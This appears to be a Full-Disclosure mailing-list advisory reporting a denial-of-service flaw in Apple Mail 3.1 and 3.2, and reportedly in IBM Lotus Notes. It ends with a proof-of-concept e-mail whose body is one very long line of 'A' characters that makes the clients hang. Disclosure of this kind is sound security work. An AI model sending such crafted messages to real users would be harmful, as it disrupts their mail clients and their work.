***Summary*** A maliciously crafted e-mail message can cause a denial of service in multiple versions of the Apple Mail email client. ***Scope*** Apple Mail version 3.1 (914/915) Apple Mail version 3.2 (919/919.2) Note: other versions of this product may be vulnerable as well; I have not tested them. The vendor has been made aware of this issue and has chosen not to treat it as a security issue. Interestingly enough, a similar issue seems to be present in multiple versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611) . The exploit provided in this advisory will also cause a denial of service condition on multiple versions of IBM Lotus Notes. IBM has been kind enough to create SPR# PRAD7DPKLW to address the issue the exploit targets. ***Description*** An email message with a maliciously crafted body (in my tests I used a long line) can cause the e-mail client to hang, resulting in a denial of service condition. Testing with emails that do not have any newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line consisting of 1.5 MB can cause the email clients to hang for over half an hour. Initial testing reveals the following: In Apple Mail, the e-mail is rendered correctly in the preview pane but a subsequent click on a different e-mail causes the application to hang. ***Credits*** David Wharton ***References*** Apple Mail http://www.apple.com/macosx/features/mail.html ***PoC Exploit*** Below is a sample e-mail with headers (some headers removed or modified) that causes the e-mail clients to hang as discussed. Note that the body is one long line and the "=" character is not part of; it is there for formatting but in reality most of the body is one long contiguous string of A's. Subject: dos test MIME-Version: 1.0 From: xxxxx@xxxxx.com To: xxxxx@xxxxx.com Date: xxxxx Message-ID: X-Mailer: xxxxx MIME-Version: 1.0 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0 X-CTASD-IP: xxx.xxx.xxx.xxx X-CTASD-Sender: xxxxx@xxxxx.com x-ctasd: uncategorized x-ctasd-vod: uncategorized x-ctasd-station: X-OriginalArrivalTime: xxxxx@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = (removed a few thousand 'A's) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAN= OTICE: This e-mail message and all attachments transmitted with it may con= tain confidential information intended solely for the use of the addressee.=
= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/